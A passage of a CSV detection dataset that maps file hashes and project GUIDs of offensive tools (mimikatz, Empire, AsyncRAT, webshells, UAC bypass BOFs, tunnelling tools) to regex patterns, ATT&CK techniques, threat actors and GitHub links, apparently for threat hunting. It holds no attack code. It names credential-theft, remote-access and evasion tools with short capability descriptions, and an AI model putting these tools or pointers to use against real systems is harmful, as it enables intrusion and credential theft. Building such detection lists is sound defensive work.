It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passwords/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","27779" "*618af083df8944b89618a4bed2d4be44f901f3b9659f066d6e210ec0cb92e603*",".{0,1000}618af083df8944b89618a4bed2d4be44f901f3b9659f066d6e210ec0cb92e603.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","27780" 
"*618eea76cd6f9ea8adcaa2e96236c352db4a034e52bd3d1a1140012d5510389b*",".{0,1000}618eea76cd6f9ea8adcaa2e96236c352db4a034e52bd3d1a1140012d5510389b.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","#filehash","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","27782" "*6191bb09381c0a8a09db8e7753b7ef89084aaf7557e1605cfeb3abdca258f3ad*",".{0,1000}6191bb09381c0a8a09db8e7753b7ef89084aaf7557e1605cfeb3abdca258f3ad.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","0","#filehash","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","27783" "*61962c854aa17175796608bf590ae78f3dfcb37a74463a47114b3cdaacc7fc9e*",".{0,1000}61962c854aa17175796608bf590ae78f3dfcb37a74463a47114b3cdaacc7fc9e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27785" "*619B7612-DFEA-442A-A927-D997F99C497B*",".{0,1000}619B7612\-DFEA\-442A\-A927\-D997F99C497B.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","#GUIDproject","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","27786" "*619B7612-DFEA-442A-A927-D997F99C497B*",".{0,1000}619B7612\-DFEA\-442A\-A927\-D997F99C497B.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","27787" "*61b9260e2f3a75f5ab48bf3fc674810f1afddaa4d79bf670c49771e5ed4c5277*",".{0,1000}61b9260e2f3a75f5ab48bf3fc674810f1afddaa4d79bf670c49771e5ed4c5277.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27789" "*61b990b8dd868920a48c4f599a255173824f5576db1ad712d331dc8f57e5a05a*",".{0,1000}61b990b8dd868920a48c4f599a255173824f5576db1ad712d331dc8f57e5a05a.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","27790" "*61b9a95658575424bb3e30ed5d83ee9a327924c7fe65d8c6379a86db287b3fea*",".{0,1000}61b9a95658575424bb3e30ed5d83ee9a327924c7fe65d8c6379a86db287b3fea.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27791" "*61c0810a23580cf492a6ba4f7654566108331e7a4134c968c2d6a05261b2d8a1*",".{0,1000}61c0810a23580cf492a6ba4f7654566108331e7a4134c968c2d6a05261b2d8a1.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 
- T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","27792" "*61c0810a23580cf492a6ba4f7654566108331e7a4134c968c2d6a05261b2d8a1*",".{0,1000}61c0810a23580cf492a6ba4f7654566108331e7a4134c968c2d6a05261b2d8a1.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - 
Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","27793" "*61c0af74e23b91ced41254e8d701482a157464d4*",".{0,1000}61c0af74e23b91ced41254e8d701482a157464d4.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","27794" "*61CE6716-E619-483C-B535-8694F7617548*",".{0,1000}61CE6716\-E619\-483C\-B535\-8694F7617548.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","#GUIDproject","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","27796" "*61CE6716-E619-483C-B535-8694F7617548*",".{0,1000}61CE6716\-E619\-483C\-B535\-8694F7617548.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","0","#GUIDproject","N/A","10","10","1081","131","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z","27797" "*61d34e67ae3b3c28281dd29a2a8dd90a7ee3924a2550a0fc7b8eb1c01c7f83c7*",".{0,1000}61d34e67ae3b3c28281dd29a2a8dd90a7ee3924a2550a0fc7b8eb1c01c7f83c7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous 
webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27798" "*61d81c3ef4a77bd815d196b650e773ed31a507320c43c52bb9f6798eff4d3413*",".{0,1000}61d81c3ef4a77bd815d196b650e773ed31a507320c43c52bb9f6798eff4d3413.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","27799" "*61e2497d69dac4b2bd43cb7f8427a81c52eb4f75e0b75b0550b136f3beff877a*",".{0,1000}61e2497d69dac4b2bd43cb7f8427a81c52eb4f75e0b75b0550b136f3beff877a.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","27801" "*61e6d96902e5eae3155c70f26b7cd5cf544ab5907958a451d34c8ef08688c71a*",".{0,1000}61e6d96902e5eae3155c70f26b7cd5cf544ab5907958a451d34c8ef08688c71a.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27802" "*61f1bf9bb6daa4d45e44e176c22610569cef864f328390b142188b52f9984195*",".{0,1000}61f1bf9bb6daa4d45e44e176c22610569cef864f328390b142188b52f9984195.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27803" "*61f31088bc43825c500d7d6f22dd7d259b56dd181c9a59650975bd5e9e91cb25*",".{0,1000}61f31088bc43825c500d7d6f22dd7d259b56dd181c9a59650975bd5e9e91cb25.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","#filehash","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","27804" "*6205ddc22a991d9dba9457361b6d4fde7e51b4ca388fafa89fe883a8969202c0*",".{0,1000}6205ddc22a991d9dba9457361b6d4fde7e51b4ca388fafa89fe883a8969202c0.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27809" "*6207b3bdec3775c783313cfe3c278c5d844ed035efdfa02173a23644206d3d97*",".{0,1000}6207b3bdec3775c783313cfe3c278c5d844ed035efdfa02173a23644206d3d97.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27810" "*62097f745d283d52458f0b9ed9d792e03a85dd92f73ebbcc39e125a9b0e368bd*",".{0,1000}62097f745d283d52458f0b9ed9d792e03a85dd92f73ebbcc39e125a9b0e368bd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27811" "*620d4c08d472520f16e52e35c1eb622c43fe583b40b977b258828ac05f439dba*",".{0,1000}620d4c08d472520f16e52e35c1eb622c43fe583b40b977b258828ac05f439dba.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - 
MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","27812" "*620d4c08d472520f16e52e35c1eb622c43fe583b40b977b258828ac05f439dba*",".{0,1000}620d4c08d472520f16e52e35c1eb622c43fe583b40b977b258828ac05f439dba.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","27813" "*62123825c06d2e0915bc2f3dbaa36701c5caf2ed20cabb6cae04004765953627*",".{0,1000}62123825c06d2e0915bc2f3dbaa36701c5caf2ed20cabb6cae04004765953627.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - 
T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27814" "*6212badbf494f425f21ff4792c83e272dfa8b7c3352a993aa352e2cbe6d97106*",".{0,1000}6212badbf494f425f21ff4792c83e272dfa8b7c3352a993aa352e2cbe6d97106.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","27815" "*621b1aa1737a16c3f34b44236e3c16afa0e0fcbef095bb4d11ce21715e8cc83a*",".{0,1000}621b1aa1737a16c3f34b44236e3c16afa0e0fcbef095bb4d11ce21715e8cc83a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27817" "*621ee90fbd4723db93d31f385fd3ecac944076a161845d433755faff0d3069a8*",".{0,1000}621ee90fbd4723db93d31f385fd3ecac944076a161845d433755faff0d3069a8.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27818" 
"*622f3304b381b2f3a99567be78a668e21c1c6a405320da78a2af32addbc29d88*",".{0,1000}622f3304b381b2f3a99567be78a668e21c1c6a405320da78a2af32addbc29d88.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","0","#filehash","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","27819" "*623c26776e69954af0e99704281ead9358f64dcdc915b38a0b2c532593441ea3*",".{0,1000}623c26776e69954af0e99704281ead9358f64dcdc915b38a0b2c532593441ea3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27820" "*623eff8ac5efc0fd81c37ff8262eba95b7ea2bb941366b7edde5dcf5524292fd*",".{0,1000}623eff8ac5efc0fd81c37ff8262eba95b7ea2bb941366b7edde5dcf5524292fd.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","27821" "*623F0079-5871-4237-B872-70FDFC2D8C52*",".{0,1000}623F0079\-5871\-4237\-B872\-70FDFC2D8C52.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 
certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","#GUIDproject","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","27822" "*624f527a957cb2ef90782b1b92d94aa22f1028b731d95536fa318c3c1f211d5e*",".{0,1000}624f527a957cb2ef90782b1b92d94aa22f1028b731d95536fa318c3c1f211d5e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27825" "*625ff12afe53772a22004e384bc21481dbfbc0b4e25dce987e814304e586338b*",".{0,1000}625ff12afe53772a22004e384bc21481dbfbc0b4e25dce987e814304e586338b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27827" "*6261764bd7c2edc8924a08ca5d9849ef004afe9a0fab841c2c3fb8f4f1d1a406*",".{0,1000}6261764bd7c2edc8924a08ca5d9849ef004afe9a0fab841c2c3fb8f4f1d1a406.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","27829" 
"*627d9d2bd4fcbb2b219ad2dc49a25ebc695700cb0fc2f1eacdd56cb71d44e258*",".{0,1000}627d9d2bd4fcbb2b219ad2dc49a25ebc695700cb0fc2f1eacdd56cb71d44e258.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27836" "*627eead4a57da2a46e0ea487bfef48d152687cc6c39d1bfd25203a3a0d501de8*",".{0,1000}627eead4a57da2a46e0ea487bfef48d152687cc6c39d1bfd25203a3a0d501de8.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27837" "*628e139e7f12c2e5cac243778c3fe428c878aaf690e64cf650e0be14915eee1e*",".{0,1000}628e139e7f12c2e5cac243778c3fe428c878aaf690e64cf650e0be14915eee1e.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","27838" "*628E42D5-AE4F-4CDD-8D14-DAB1A3697B62*",".{0,1000}628E42D5\-AE4F\-4CDD\-8D14\-DAB1A3697B62.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","27839" "*6290c67de059c8c86e7051348a1fd0934c8bdf6b9badb539a878a1801b0431d6*",".{0,1000}6290c67de059c8c86e7051348a1fd0934c8bdf6b9badb539a878a1801b0431d6.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","0","#filehash","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","27840" 